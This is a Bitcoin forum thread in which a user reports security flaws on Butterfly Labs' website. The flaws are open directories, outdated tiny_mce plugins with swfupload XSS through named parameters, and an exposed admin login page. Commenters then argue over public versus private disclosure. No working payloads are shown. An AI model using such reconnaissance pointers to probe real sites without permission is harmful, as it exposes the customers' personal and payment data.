Bitcoin Forum

So, after seeing this last night about them leaking their own database login (http://www.reddit.com/r/Bitcoin/comments/1didas/is_butterfly_labs_sql_password_adminbtl123/), I decided to have some fun and poke around the site.

Just for fun, here's what I found:

- Directory Listing Enabled
-- Interesting directories:
--- http://www.butterflylabs.com/upload/
--- http://www.butterflylabs.com/images -
--- http://www.butterflylabs.com/images/users/ <-- What the hell is this stuff? Personal files and photos?
- 2 vulnerable tiny_mce plugins (both vulnerabilities have been fixed for ages, they haven't updated)
-- archiv and it's swfupload XSS. There's 2 seperate XSS' here, using 2 different parameters.
--- using movieName: --- using buttonText: -- media plugin uses vulnerable moxieplayer.swf: - Their site was copied from Webspawner.
-- Some proof: http://butterflylabs.com/images//admin/admin_logo.png - http://www.webspawner.com/admin/login
-- Admin login page: http://butterflylabs.com/admin

Don't trust a company this amateur.

EDIT: Congratulations on the fast fixes. Now disable directory listing @ https://support.butterflylabs.com/
EDIT 2: Everything's fixed. Stay on your toes BFL... I'm not done ;)

While, it's good of you to alert people. I think you should have alerted them instead of publicly outing their exploits as soon as you found them.

But hey, if your tactic is to get professional penetrators to cause a stir, more power to ya. I just wouldn't have done it this way.

Agree with mustyoshi. People go to jail for a *long* time for doing what n4ru just did.

The fastest way to get anything fixed is public outing.

That's weak coding nice infiltration do that myself sometimes
http://www.butterflylabs.com/images/admin/butterfly-admin.jpg

It's fine and dandy to believe that, except by outing this, you've put other people's information at risk. Let's say somebody does get into BFL's systems, what kind of information do you think they have stored on their servers? Information that somebody who has a vendetta against bitcoin could put to good use, such as the mailing addresses of tens of thousands of people. Not to mention any related payment information.

Not the right directory I believe

Which is ridiculous. We need people to focus on security if they are coding something especially a website. Sometimes I think that all that some programmers think while they are coding is that it has to work during their 10sec testing and if someone breaks into their system they say: "It wasn't my fault it's always these evil hackers who have nothing better to do than destroying my hard work".
Breaking into systems and therefore exposing ppl to the laugh of the public must be legalized to improve security. There are way to many amateurs running big projects. We need a way to legally knock them out.

Well said.

Agreed hackers like exploring architecture and systems its a natural instinct and curiosity just make a good defense so we can learn :)
Sides we always say evil hackers we mean evil crackers lol (Evil soda crackers :) since they are the new overlords XD

I agree, it's the responsibility of the designer/programmer.  I am displeased with this and will be investigating it going forward.  Sometimes it feels like I have to do everything myself.

Say what you will about Josh's usual responses, but this IMO was the perfect reaction to this situation.

Crack the whip!

At least you guys responded to this quick and got it fixed. There was a lot more that could have been done with malicious intent.

You posted it because you wanted to flex your e-peen.

I'm sure everyone is glad that you decided there time was best spent fixing this.

Pretty lulzy stuff.


Yeah, right. In you know...Iran. Or whatever other shithole noncountry.

At first I wanted to mention Aaron Swartz as counter argument, but realized that MPOE-PR is right. Mostly shithole noncountries like Iran, USA or China are affected :)
edit: to be a little positive +1 for Inaba's reaction.

sense disagree with mope-pr. ALERT! seek clarification?

are you saying its good practice to out people's security vulnerabilities without contacting them first?

Here's something interesting: http://webcache.googleusercontent.com/search?q=cache:V2NAhB0iUlwJ:butterflylabs.com/images/users/000/003/366/066/imageGallery/+&cd=2&hl=en&ct=clnk&gl=us


I only know of one pilot associated with Butterfly Labs, and that person wouldn't have had access to BFL's computer at that time because https://bitcointalk.org/index.php?topic=97269.msg1071218#msg1071218

It's a shame that image is no longer available. Or is it?

I can appreciate the theoretical outlook you're coming from. Here's what happens when you try to contact idiots first: http://www.google.com/search?q=bitdaytrade+reddit

Look through the posts there, you have actually competent people trying to talk the guy into safety and some strutting imbecile puffing a lot of smoke about the imaginary experts he's hired, the imaginary expertise he has and on and on.

Thus I can certainly appreciate the practical outlook of warning the community first. I guess in the end it all comes down to a judgement call. Did the OP think the failed site is administered by sane people likely to take appropiate measures in a timely and effective manner, or did the OP think the failed site is a scam run by patent liars (Vleisides (https://bitcointalk.org/index.php?topic=110868.msg1210400#msg1210400), Zerlan (http://josh-zerlan.com) etc)?

Everything? Oh you mean like those half-assed updates that have no substance? Rrrrright lol

Dont make me laugh Joshy-boy.

The guy claims to do everything, but denies being the Project Manager, even though BFL doesn't officially have one, with him being the COO taking up that role.

I fed your chicken, Jody.
Sonny, I let the gardener go home early, therefore I'll finish planting the flowers.
I'll get that pallet, Dave.
This is the way we mop the floors, mop the floors, mop the floors...
"Cocksucker!" I love answering the emails.
"Any questions, folks, before we end the daily tour at BFL?"
"Acme Components? Yes, we would like to double our order. Make that 40 resisters, 10 power packs..."
So many anniversaries this month, luckily they have me in charge of the party supplies.
"Therefore, Bob, if you cancel your order, you'll lose your place in the queue. Do you really want to cancel, for we is about to ship. Honest Abe! Fine, and for not canceling we're sending you a 10% off coupon to offset the next price increase." Click! "Fuckin' cocksucker!"
Note to self: Make sure there's no known anomalies on the website today.
"One, two, three, four, five... I love counting fans in the warehouse."
Shoutbox: I confirm that bet.
Twitter: I AND BFL confirm our bets.
BT: It's a bet.
BFL Forum: That is why we bet...
Bum on the street: Sorry, bud. I gave my last real money at CES to some dude with a camera.
All my bags are pack, and I'm on the road again, (different song-->) https://www.youtube.com/watch?v=-cfc3rCQOuU

Yes I certainly agree its a tough call between protecting the innocent, and tarring and feathering incompetent admins into taking action.

I think the way that guy did it was better, "you register, ill show you I can get your pw hash" a good mix of publicly outing them, without actually posting the vulnerability itself letter by letter.

(also sorry for MPOE typo on my previous post... autocorrect :/  )

Maybe my opinion is coloured by me having an outstanding order with BFL, but I'm still giving them the benefit of the doubt, in that I understand what they are doing is hard. Maybe that makes me a sucker, time will tell, and if I do lose that money well that will be another one to chalk up to experience. I'm not so naive as to think that every btc 'investment' I make is gonna pay out. Anyway I think thats a different subject!

Me I'd have contacted them at first, and *then* when they didn't do anything start escalating.